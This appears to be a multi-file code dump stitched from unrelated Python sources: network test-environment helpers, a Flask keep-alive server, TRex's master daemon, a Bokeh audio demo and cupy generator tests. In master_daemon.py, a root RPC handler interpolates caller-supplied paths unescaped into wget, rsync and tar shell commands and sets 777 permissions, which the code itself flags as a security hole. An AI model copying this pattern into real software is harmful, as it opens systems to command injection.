error_messages = []
# Sort by start priorities
prio_dict = self._get_prio_dict("kprio")
s_list = sorted(prio_dict.keys())
# In further method calling we set safe flag or use safe_executor
# to log and pass exceptions on destroy.
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], "destroy", True)
else:
for obj in prio_dict[_s]:
err_msg = self.safe_executor(obj, "destroy")
if err_msg:
error_messages.append(err_msg)
if error_messages:
message = "The following errors encountered on environment shutdown:\n%s" % ("".join(error_messages), )
self.class_logger.error(message)
# if stdout logging is disabled print error messages anyway
if not loggers.LOG_STREAM:
sys.stderr.write("ERROR:\n%s" % (message, ))
sys.stderr.flush()
def get_device_id(self, dut):
"""Search device in config object by device name.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Raises:
TAFCoreException: unknown device type
Returns:
str, int: Device id which configured.
Examples (Config object like)::
{
"env": [
{"id": 5, "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "autoname": "DEV2", "port_list": [["port1", 10000], ["port2", 40000]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
# by LINK_NAME
env.get_device_id("sw1") == 5
# by "autoname"
env.get_device_id("DEV2") == 9
# by ID
env.get_device_id(9) == 9
"""
# Find dut in dut_map if it is ID device
if dut in list(self.dut_map.values()):
return dut
# Find dut acronym in dut_map
elif dut in self.dut_map:
# If acronym in dut_map
dev_id = self.dut_map[dut]
return dev_id
# Find dut acronym in autoname_map
elif dut in self.autoname_map:
# If acronym in autoname_map
dev_id = self.autoname_map[dut]
return dev_id
# Raise an exception if invalid device type
else:
message = "This device type not found. This method supports only %s or %s device types." % (list(self.dut_map.keys()), list(self.autoname_map.keys()))
raise TAFCoreException(message)
def get_real_port_name(self, dut, port_id):
"""Search real port number/name by device name and port Id in config object.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1).
Raises:
TAFCoreException: port_id is not found in configuration; device doesn't have ports or port_list attributes
Returns:
int, str: Real port number/name or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 10000]},
{"id": 100, "ports": ["port10", 11]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
# by LINK_MAME
env.get_real_port_name("sw2", 2) == 11
# by "autoname"
env.get_real_port_name("DEV1", 1) == "port1"
"""
# find device ID by acronym
dev_id = self.get_device_id(dut)
# find device object
dev_obj = self.id_map[dev_id]
# find port_id in port_list
# WARNING: We HAVE to check ports and port_list in objects instead of configs,
# because some device classes modify port names.
# E.g.: json doesn't support tuples, but ports have to be hashable type.
if hasattr(dev_obj, "port_list") and dev_obj.port_list:
try:
return dev_obj.port_list[port_id - 1][0]
except IndexError:
message = "Port ID %s is not found in 'port_list' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
# find port_id in ports
elif hasattr(dev_obj, "ports") and dev_obj.ports:
try:
return dev_obj.ports[port_id - 1]
except IndexError:
message = "Port ID %s is not found in 'ports' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
else:
message = "Device %s(%s) doesn't have 'ports' or 'port_list' attributes." % (dev_id, dut)
raise TAFCoreException(message)
def get_port_speed(self, dut, port_id):
"""Search speed port in config object namely in 'port_list' by device name and port Id.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1)
Raises:
TAFCoreException: port is not present in configuration's 'port_list'
Returns:
int: Port speed or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 5, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "ports": ["port10", 11]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
env.get_port_speed("sw1", 2) == 40000
env.get_port_speed("DEV1", 1) == 10000
"""
# find device id by acronym
dev_id = self.get_device_id(dut)
# find device id in config
for dev_config in self.config:
if dev_config['id'] == dev_id:
# find port_id and speed in port_list
if 'port_list' in dev_config:
try:
return dev_config['port_list'][port_id - 1][1]
# raise exception if no speed for port
except IndexError:
message = "Port id %s is not configured on device %s." % (port_id, dut)
raise TAFCoreException(message)
# raise exception if not configured port_list
else:
message = "List of ports speed is not configured on device %s." % dut
raise TAFCoreException(message)
def get_ports(self, links=None):
"""Returns dictionary of ports based on links between devices.
Args:
links(list[list]): List of devices in format [['dev1', 'dev2', number_of_links, port_speed], ] (list of lists).
Where: \a number_of_links - optional parameter(int or enum - "ALL"); \a port_speed - optional parameter.
Raises:
TAFCoreException: wrong link format
Returns:
dict: ports
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000], ["port3", 10000]},
{"id": 100, "port_list": [["port10", 40000], [11, 10000], ["port12", 40000]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
ports = env.get_ports([['sw1', 'sw2', 1], ])
assert ports == {('sw2', 'sw1'): {1: "port10"}, ('sw1', 'sw2'): {1: "port1"}}
ports = env.get_ports([['DEV1', 'sw2', 2], ])
assert ports == {('sw2', 'sw1'): {1: "port10", 2: 11}, ('sw1', 'sw2'): {1: "port1", 2: "port2"}}
# with optional parameter "port_speed"
ports = env.get_ports([['sw1', 'sw2', 1, 10000], ])
assert ports == {('sw1', 'sw2'): {1: "port1"}, ('sw2', 'sw1'): {1: "11"}}
# Method returns all links between devices if no any optional parameters
ports = env.get_ports([['sw1', 'sw2', ], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# The same with enum "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL"], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# With optional parameters "port_speed" and "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL", 40000], ])
assert ports == {('sw1', 'sw2'): {1: "port2"}, ('sw2', 'sw1'): {1: "port10"}}
# Method returns all links between devices if no parameter
ports = env.get_ports()
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
"""
if links:
# Create empty prototype for ports dictionary
ports = {}
for link in links:
# if not specified all devices
if len(link) < 2:
message = "At list is not specified devices."
raise TAFCoreException(message)
ports[(link[0], link[1])] = {}
ports[(link[1], link[0])] = {}
# Process each link in links
for link in links:
# link Ids counter
link_id = 0
# if not specified number of links return all links between devices
if len(link) == 2:
link.append("ALL")
# if number of links specified zero then raise exception
if link[2] == 0:
message = "Number of links cannot equal zero."
raise TAFCoreException(message)
# the flag indicates that was set parameter port_speed
port_speed_flag = False
if len(link) == 4:
port_speed_flag = True
port_speed = link[3]
# ports Ids counter
ports_count = link[2]
if link[2] == "ALL":
ports_count = 1
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# This list will contain port Ids from setup
port_ids = []
try:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[1], setup_link[3]]
elif [setup_link[2], setup_link[0]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[3], setup_link[1]]
except TAFCoreException as err:
message = "Insufficient devices count required for test"
pytest.skip(message)
# Append ports
if port_ids:
if port_speed_flag:
if link_id < ports_count:
if self.get_port_speed(link[0], port_ids[0]) == self.get_port_speed(link[1], port_ids[1]) == port_speed:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
else:
if link_id < ports_count:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
if link[2] == "ALL":
ports_count += 1
# If all links are collected
if link_id == ports_count:
break
if link[2] == "ALL":
ports_count = link_id
# Verify that ports dictionary full filed
if (len(ports[(link[0], link[1])]) < ports_count or
len(ports[(link[1], link[0])]) < ports_count or
not ports[(link[0], link[1])] or
not ports[(link[1], link[0])]):
if port_speed_flag:
message = "No links with required speed {0}".format(port_speed)
else:
message = "Insufficient links count required for test"
pytest.skip(message)
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
else:
ports = {}
# create tuples of existing device connection pairs
for cross_id in self.setup['cross']:
for setup_link in self.setup['cross'][cross_id]:
ports[setup_link[0], setup_link[2]] = {}
ports[setup_link[2], setup_link[0]] = {}
# Process each tuple in ports
for key in ports:
# link Ids counter
link_id = 0
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
# Append ports
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[1])
elif [setup_link[2], setup_link[0]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[3])
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
class Cross(dict):
"""New interface to cross object without device id.
"""
def __init__(self, setup, env):
"""Initialize Cross class.
"""
super(Cross, self).__init__()
self.setup = setup
self.env = env
if hasattr(env, "cross"):
for key, value in list(env.cross.items()):
self[key] = value
def get_device_id(self, connection):
"""Search device in setup object by given connection.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
Raises:
Exception: no device in connection
Returns:
int: device id which own connection
"""
connection_reverse = connection[2:] + connection[:2]
try:
match = next(cross_id for cross_id, crosses in self.setup['cross'].items()
if connection in crosses or connection_reverse in crosses)
# keys() is not guaranteed to be stable, why does this work?
return list(self.setup['cross'].keys()).index(match) + 1
except StopIteration:
raise Exception("Can not find device with such connection: %s in config" % connection)
def xconnect(self, connection):
"""Wrapper for xconnect method defined in xconnect.py module.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xconnect(connection)
def xdisconnect(self, connection):
"""Wrapper for xdisconnect method defined in xconnect.py module.
Args:
connection(list): in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xdisconnect(connection)
def cross_connect(self, conn_list):
"""Wrapper for cross_connect method defined in xconnect.py module.
Args:
conn_list(list[list]): List of connections
Raises:
Exception: conn_list is empty
"""
if conn_list:
connection = conn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_connect([connection])
else:
raise Exception("conn_list is empty")
def cross_disconnect(self, disconn_list):
"""Wrapper for cross_disconnect method defined in xconnect.py module.
Args:
disconn_list(list[list]): List of connections
Raises:
Exception: disconn_list is empty
"""
if disconn_list:
connection = disconn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_disconnect(disconn_list)
else:
raise Exception("disconn_list is empty")
def get_connection(self, dev_id, port_no):
"""Get connection for device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
Raises:
Exception: no connection for current port
Returns:
list: Connection info
"""
# Get device
device_id = self.env.get_device_id(dev_id)
dev_obj = self.env.id_map[device_id]
# Get port_id from port_no
port_id = dev_obj.ports.index(port_no)
# Check for connection in setup
connection = None
for device in self.setup['cross']:
for conn in self.setup['cross'][device]:
if (device_id == conn[0] and port_id == conn[1] - 1) or (device_id == conn[2] and port_id == conn[3] - 1):
connection = conn
break
if connection is None:
raise Exception("Port {0} on device {1} is not used in current setup.".format(port_no, dev_id))
# dev_id has to be source
if connection[0] != device_id:
connection = connection[2:] + connection[:2]
return connection
def device_port_disconnect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port disconnection
self.cross_disconnect([connection, ])
def device_port_connect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port connection
self.cross_connect([connection, ])
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Creator Steus#0001"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
master_daemon.py
|
#! /bin/bash
"source" "find_python.sh" "--local"
"exec" "$PYTHON" "$0" "$@"
import os
import sys
import shutil
import threading
import logging
import time
from collections import OrderedDict
from argparse import *
from glob import glob
import signal
from functools import partial
sys.path.append(os.path.join('automation', 'trex_control_plane', 'server'))
import CCustomLogger
import outer_packages
from tcp_daemon import TCPDaemon, run_command
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
import termstyle
### Server functions ###
def check_connectivity():
return True
def add(a, b): # for sanity checks
return a + b
def get_trex_path():
return args.trex_dir
def get_package_path():
return CUpdate.info.get('path')
def get_package_sha1():
return CUpdate.info.get('sha1')
def is_updating():
return CUpdate.thread and CUpdate.thread.is_alive()
def _update_trex_process(package_path):
file_name = 'trex_package.tar.gz'
# getting new package
if package_path.startswith('http'):
ret_code, stdout, stderr = run_command('wget %s -O %s' % (package_path, os.path.join(tmp_dir, file_name)), timeout = 600)
else:
ret_code, stdout, stderr = run_command('rsync -Lc %s %s' % (package_path, os.path.join(tmp_dir, file_name)), timeout = 300)
if ret_code:
raise Exception('Could not get requested package. Result: %s' % [ret_code, stdout, stderr])
# calculating hash
ret_code, stdout, stderr = run_command('sha1sum -b %s' % os.path.join(tmp_dir, file_name), timeout = 30)
if ret_code:
raise Exception('Could not calculate hash of package. Result: %s' % [ret_code, stdout, stderr])
package_sha1 = stdout.strip().split()[0]
# clean old unpacked dirs
tmp_files = glob(os.path.join(tmp_dir, '*'))
for tmp_file in tmp_files:
if os.path.isdir(tmp_file) and not os.path.islink(tmp_file):
shutil.rmtree(tmp_file)
# unpacking
ret_code, stdout, stderr = run_command('tar -xzf %s' % os.path.join(tmp_dir, file_name), timeout = 120, cwd = tmp_dir)
if ret_code:
raise Exception('Could not untar the package. %s' % [ret_code, stdout, stderr])
tmp_files = glob(os.path.join(tmp_dir, '*'))
unpacked_dirs = []
for tmp_file in tmp_files:
if os.path.isdir(tmp_file) and not os.path.islink(tmp_file):
unpacked_dirs.append(tmp_file)
if len(unpacked_dirs) != 1:
raise Exception('Should be exactly one unpacked directory, got: %s' % unpacked_dirs)
os.chmod(unpacked_dirs[0], 0o777) # allow core dumps to be written
cur_dir = args.trex_dir
if os.path.islink(cur_dir) or os.path.isfile(cur_dir):
os.unlink(cur_dir)
if not os.path.exists(cur_dir):
os.makedirs(cur_dir)
os.chmod(cur_dir, 0o777)
bu_dir = '%s_BU%i' % (cur_dir, int(time.time()))
try:
# bu current dir
shutil.move(cur_dir, bu_dir)
shutil.move(unpacked_dirs[0], cur_dir)
CUpdate.info = {'path': package_path, 'sha1': package_sha1}
logging.info('Done updating, success')
except BaseException as e: # something went wrong, return backup dir
logging.error('Error while updating: %s' % e)
if os.path.exists(cur_dir):
shutil.rmtree(cur_dir)
shutil.move(bu_dir, cur_dir)
raise
finally:
if os.path.exists(bu_dir):
shutil.rmtree(bu_dir)
# non blocking update
def update_trex(package_path = 'http://trex-tgn.cisco.com/trex/release/latest'):
if not args.allow_update:
raise Exception('Updating server not allowed')
if CUpdate.thread and CUpdate.thread.is_alive():
CUpdate.thread.terminate()
CUpdate.thread = threading.Thread(target = _update_trex_process, args = [package_path])
CUpdate.thread.daemon = True
CUpdate.thread.start()
def save_coredump():
latest_core_file = {
'time': 0,
'path': None}
for core_file in glob(os.path.join(args.trex_dir, 'core*')):
mod_time = os.path.getmtime(core_file)
if latest_core_file['time'] < mod_time:
latest_core_file['time'] = mod_time
latest_core_file['path'] = core_file
if latest_core_file['path']:
shutil.copy(latest_core_file['path'], os.path.join(tmp_dir, 'coredump'))
### /Server functions ###
def fail(msg):
print(msg)
sys.exit(-1)
def set_logger():
log_dir = os.path.dirname(logging_file)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if os.path.exists(logging_file):
if os.path.exists(logging_file_bu):
os.unlink(logging_file_bu)
os.rename(logging_file, logging_file_bu)
CCustomLogger.setup_daemon_logger('Master daemon', logging_file)
def log_usage(name, func, *args, **kwargs):
log_string = name
if args:
log_string += ', args: ' + repr(args)
if kwargs:
log_string += ', kwargs: ' + repr(kwargs)
logging.info(log_string)
return func(*args, **kwargs)
def start_master_daemon():
funcs_by_name = {}
# master_daemon functions
funcs_by_name['add'] = add
funcs_by_name['check_connectivity'] = check_connectivity
funcs_by_name['get_trex_path'] = get_trex_path
funcs_by_name['get_package_path'] = get_package_path
funcs_by_name['get_package_sha1'] = get_package_sha1
funcs_by_name['is_updating'] = is_updating
funcs_by_name['update_trex'] = update_trex
funcs_by_name['save_coredump'] = save_coredump
# trex_daemon_server
funcs_by_name['is_trex_daemon_running'] = trex_daemon_server.is_running
funcs_by_name['restart_trex_daemon'] = trex_daemon_server.restart
funcs_by_name['start_trex_daemon'] = trex_daemon_server.start
funcs_by_name['stop_trex_daemon'] = trex_daemon_server.stop
# stl rpc proxy
funcs_by_name['is_stl_rpc_proxy_running'] = stl_rpc_proxy.is_running
funcs_by_name['restart_stl_rpc_proxy'] = stl_rpc_proxy.restart
funcs_by_name['start_stl_rpc_proxy'] = stl_rpc_proxy.start
funcs_by_name['stop_stl_rpc_proxy'] = stl_rpc_proxy.stop
try:
set_logger()
server = SimpleJSONRPCServer(('0.0.0.0', master_daemon.port))
logging.info('Started master daemon (port %s)' % master_daemon.port)
for name, func in funcs_by_name.items():
server.register_function(partial(log_usage, name, func), name)
server.register_function(server.funcs.keys, 'get_methods') # should be last
signal.signal(signal.SIGTSTP, stop_handler) # ctrl+z
signal.signal(signal.SIGTERM, stop_handler) # kill
server.serve_forever()
except KeyboardInterrupt:
logging.info('Ctrl+C')
except Exception as e:
logging.error('Closing due to error: %s' % e)
finally:
if CUpdate.thread and CUpdate.thread.is_alive():
CUpdate.thread.terminate()
def stop_handler(signalnum, *args, **kwargs):
if CUpdate.thread and CUpdate.thread.pid == os.getpid():
logging.info('Updating aborted.')
else:
logging.info('Got signal %s, exiting.' % signalnum)
sys.exit(0)
# returns True if given path is under current dir or /tmp
def _check_path_under_current_or_temp(path):
if not os.path.relpath(path, '/tmp').startswith(os.pardir):
return True
if not os.path.relpath(path, os.getcwd()).startswith(os.pardir):
return True
return False
### Main ###
if os.getuid() != 0:
fail('Please run this program as root/with sudo')
pid = os.getpid()
ret, out, err = run_command('taskset -pc 0 %s' % pid)
if ret:
fail('Could not set self affinity to core zero. Result: %s' % [ret, out, err])
daemon_actions = OrderedDict([('start', 'start the daemon'),
('stop', 'exit the daemon process'),
('show', 'prompt the status of daemon process (running / not running)'),
('restart', 'stop, then start again the daemon process')])
actions_help = 'Specify action command to be applied on master daemon.\n' +\
'\n'.join([' (*) %-11s: %s' % (key, val) for key, val in daemon_actions.items()])
daemons = {}.fromkeys(['master_daemon', 'trex_daemon_server', 'stl_rpc_proxy'])
# show -p --master_port METAVAR instead of -p METAVAR --master_port METAVAR
class MyFormatter(RawTextHelpFormatter):
def _format_action_invocation(self, action):
if not action.option_strings or action.nargs == 0:
return super(MyFormatter, self)._format_action_invocation(action)
default = action.dest.upper()
args_string = self._format_args(action, default)
return ', '.join(action.option_strings) + ' ' + args_string
parser = ArgumentParser(description = 'Runs master daemon that can start/stop TRex daemon or update TRex version.',
formatter_class = MyFormatter)
parser.add_argument('-p', '--master-port', type=int, default = 8091, dest='master_port',
help = 'Select port to which the Master daemon will listen.\nDefault is 8091.', action = 'store')
parser.add_argument('--trex-daemon-port', type=int, default = 8090, dest='trex_daemon_port',
help = 'Select port to which the TRex daemon server will listen.\nDefault is 8090.', action = 'store')
parser.add_argument('--stl-rpc-proxy-port', type=int, default = 8095, dest='stl_rpc_proxy_port',
help = 'Select port to which the Stateless RPC proxy will listen.\nDefault is 8095.', action = 'store')
parser.add_argument('-d', '--trex-dir', type=str, default = os.getcwd(), dest='trex_dir',
help = 'Path of TRex, default is current dir', action = 'store')
parser.add_argument('--allow-update', default = False, dest='allow_update', action = 'store_true',
help = "Allow update of TRex via RPC command. WARNING: It's security hole! Use on your risk!")
parser.add_argument('action', choices = daemon_actions,
action = 'store', help = actions_help)
parser.add_argument('--type', '--daemon-type', '--daemon_type', choices = daemons.keys(), dest = 'daemon_type',
action = 'store', help = 'Specify daemon type to start/stop etc.\nDefault is master_daemon.')
args = parser.parse_args()
args.trex_dir = os.path.abspath(args.trex_dir)
args.daemon_type = args.daemon_type or 'master_daemon'
stl_rpc_proxy_dir = os.path.join(args.trex_dir, 'automation', 'trex_control_plane', 'server')
stl_rpc_proxy = TCPDaemon('Stateless RPC proxy', args.stl_rpc_proxy_port, "su -s /bin/bash -c '%s rpc_proxy_server.py' nobody" % sys.executable, stl_rpc_proxy_dir)
trex_daemon_server = TCPDaemon('TRex daemon server', args.trex_daemon_port, '%s trex_daemon_server start' % sys.executable, args.trex_dir)
master_daemon = TCPDaemon('Master daemon', args.master_port, start_master_daemon) # add ourself for easier check if running, kill etc.
tmp_dir = '/tmp/trex-tmp'
logging_file = '/var/log/trex/master_daemon.log'
logging_file_bu = '/var/log/trex/master_daemon.log_bu'
os.chdir('/')
class CUpdate:
info = {}
thread = None
if not _check_path_under_current_or_temp(args.trex_dir):
raise Exception('Only allowed to use path under /tmp or current directory')
if os.path.isfile(args.trex_dir):
raise Exception('Given path is a file')
if not os.path.exists(args.trex_dir):
print('Path %s does not exist, creating new assuming TRex will be unpacked there.' % args.trex_dir)
os.makedirs(args.trex_dir)
os.chmod(args.trex_dir, 0o777)
elif args.allow_update:
print('Due to allow updates flag, setting mode 777 on given directory')
os.chmod(args.trex_dir, 0o777)
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if args.daemon_type not in daemons.keys(): # not supposed to happen
raise Exception('Error in daemon type , should be one of following: %s' % daemon.keys())
daemon = vars().get(args.daemon_type)
if not daemon:
raise Exception('Daemon %s does not exist' % args.daemon_type)
if args.action != 'show':
func = getattr(daemon, args.action)
if not func:
raise Exception('%s does not have function %s' % (daemon.name, args.action))
try:
func()
except:
try: # give it another try
time.sleep(1)
func()
except Exception as e:
print(termstyle.red(e))
sys.exit(1)
passive = {'start': 'started', 'restart': 'restarted', 'stop': 'stopped', 'show': 'running'}
if (args.action in ('show', 'start', 'restart')) ^ (not daemon.is_running()):
print(termstyle.green('%s is %s' % (daemon.name, passive[args.action])))
sys.exit(0)
else:
print(termstyle.red('%s is NOT %s' % (daemon.name, passive[args.action])))
sys.exit(-1)
|
soundserver_threaded.py
|
import flask
import os
from os.path import join
import sys
import hemlib
try:
import simplejson as json
except:
import json
app = flask.Flask(__name__)
import pyaudio
from numpy import zeros, linspace, short, fromstring, hstack, transpose
from scipy import fft
HOST = "localhost"
PORT = 9294
NUM_SAMPLES = 1024
SAMPLING_RATE = 44100
MAX_FREQ = SAMPLING_RATE / 8
FREQ_SAMPLES = NUM_SAMPLES / 8
SPECTROGRAM_LENGTH = 400
# Maximum time we want to spend polling the microphone for a single request
MAX_REQ_TIME = 0.05
adata = 0
from threading import Thread, RLock
import numpy as np
mutex = RLock()
_stream = None
def get_audio_data():
global adata, _stream
if _stream is None:
pa = pyaudio.PyAudio()
_stream = pa.open(format=pyaudio.paInt16, channels=1, rate=SAMPLING_RATE,
input=True, frames_per_buffer=NUM_SAMPLES)
while True:
try:
audio_data = fromstring(_stream.read(NUM_SAMPLES), dtype=np.int16)
normalized_data = audio_data / 32768.0
with mutex:
adata = (abs(fft(normalized_data))[:NUM_SAMPLES/2], normalized_data)
except:
with mutex:
adata = 0
# def onTimer(self, *args):
# spectrum, time = get_audio_data()
# self.spectrum_data.set_data('amplitude', spectrum)
# self.time_data.set_data('amplitude', time)
# spectrogram_data = self.spectrogram_plotdata.get_data('imagedata')
# spectrogram_data = hstack((spectrogram_data[:,1:],
# transpose([spectrum])))
#SRCDIR = "../../static/coffee"
SRCDIR = "static/bokehjs_static/coffee"
EXAMPLE_SRCDIR = "static/coffee"
EXCLUDES = [join(SRCDIR,"demo"), join(SRCDIR,"unittest"),
join(SRCDIR,"unittest/primitives")]
@app.route("/")
def root():
""" Returns the spectrogram of audio data served from /data
"""
app.debug = True
if app.debug:
with open("slug.json") as f:
slug = json.load(f)
jslibs = hemlib.slug_libs(app, slug['libs'])
hemfiles = hemlib.coffee_assets(SRCDIR, HOST, PORT,
excludes=EXCLUDES)
else:
jslibs = ['/static/js/demo/application.js']
hemfiles = []
print "soundserver hemfiles", hemfiles
#demofiles = [os.path.join(EXAMPLE_SRCDIR,".coffee") for name in demos]
demofiles = ["static/coffee/spectrogram.coffee"]
for demo in demofiles:
if not os.path.isfile(demo):
raise RuntimeError("Cannot find demo named '%s'"%demo)
hemfiles.extend(hemlib.make_urls(demofiles, HOST, PORT))
return flask.render_template("spectrogram.html", jslibs = jslibs,
hemfiles=hemfiles, demos="basdf")
#return flask.render_template("spectrogram.html")
@app.route("/data")
def data():
""" Returns the current audio data sample as a JSON list of two
arrays of floating-point values: (fft values, audio sample values)
"""
global adata
to_send = None
#minimal work in mutex
with mutex:
if not adata:
return json.dumps({})
else:
to_send = adata
adata = None
if to_send:
return json.dumps([to_send[0].tolist(), to_send[1].tolist()])
def main():
""" Starts the sound server, which retains the audio data inside
its process space, and forks out workers when web connections are
made.
"""
t = Thread(target = get_audio_data, args = ())
t.daemon = True
t.setDaemon(True)
t.start()
app.debug = True
app.run()
if __name__ == "__main__":
main()
|
test_generator_api.py
|
import threading
import unittest
import pytest
import numpy
import cupy
from cupy import random
from cupy import testing
from cupy.testing import _condition
from cupy_tests.random_tests import common_distributions
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class GeneratorTestCase(common_distributions.BaseGeneratorTestCase):
target_method = None
def get_rng(self, xp, seed):
if xp is cupy:
return cupy.random._generator_api.Generator(
random._bit_generator.Philox4x3210(seed=seed))
else:
return numpy.random.Generator(numpy.random.MT19937(seed))
def set_rng_seed(self, seed):
self.rng.bit_generator = random._bit_generator.Philox4x3210(seed=seed)
class InvalidOutsMixin:
def invalid_dtype_out(self, **kwargs):
out = cupy.zeros((3, 2), dtype=cupy.float32)
with pytest.raises(TypeError):
self.generate(size=(3, 2), out=out, **kwargs)
def invalid_contiguity(self, **kwargs):
out = cupy.zeros((4, 6), dtype=cupy.float64)[0:3:, 0:2:]
with pytest.raises(ValueError):
self.generate(size=(3, 2), out=out, **kwargs)
def invalid_shape(self, **kwargs):
out = cupy.zeros((3, 3), dtype=cupy.float64)
with pytest.raises(ValueError):
self.generate(size=(3, 2), out=out, **kwargs)
def test_invalid_dtype_out(self):
self.invalid_dtype_out()
def test_invalid_contiguity(self):
self.invalid_contiguity()
def test_invalid_shape(self):
self.invalid_shape()
@testing.parameterize(*common_distributions.exponential_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestExponential(
common_distributions.Exponential,
GeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.poisson_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestPoisson(
common_distributions.Poisson,
GeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.beta_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestBeta(
common_distributions.Beta,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestStandardExponential(
InvalidOutsMixin,
common_distributions.StandardExponential,
GeneratorTestCase,
):
pass
@testing.parameterize(*common_distributions.gamma_params)
@testing.gpu
@testing.fix_random()
class TestGamma(
common_distributions.Gamma,
GeneratorTestCase,
):
pass
@testing.parameterize(*common_distributions.standard_gamma_params)
@testing.gpu
@testing.fix_random()
class TestStandardGamma(
common_distributions.StandardGamma,
GeneratorTestCase,
):
pass
@testing.gpu
@testing.fix_random()
class TestStandardGammaInvalid(InvalidOutsMixin, GeneratorTestCase):
target_method = 'standard_gamma'
def test_invalid_dtype_out(self):
self.invalid_dtype_out(shape=1.0)
def test_invalid_contiguity(self):
self.invalid_contiguity(shape=1.0)
out = cupy.zeros((4, 6), order='F', dtype=cupy.float64)
with pytest.raises(ValueError):
self.generate(size=(4, 6), out=out, shape=1.0)
def test_invalid_shape(self):
self.invalid_shape(shape=1.0)
def test_invalid_dtypes(self):
for dtype in 'bhiqleFD':
with pytest.raises(TypeError):
self.generate(size=(3, 2), shape=1.0, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestStandardGammaEmpty(GeneratorTestCase):
target_method = 'standard_gamma'
def test_empty_shape(self):
y = self.generate(shape=cupy.empty((1, 0)))
assert y.shape == (1, 0)
def test_empty_size(self):
y = self.generate(1.0, size=(1, 0))
assert y.shape == (1, 0)
def test_empty_out(self):
out = cupy.empty((1, 0))
y = self.generate(cupy.empty((1, 0)), out=out)
assert y is out
assert y.shape == (1, 0)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.parameterize(*common_distributions.standard_normal_params)
@testing.fix_random()
class TestStandardNormal(
common_distributions.StandardNormal,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
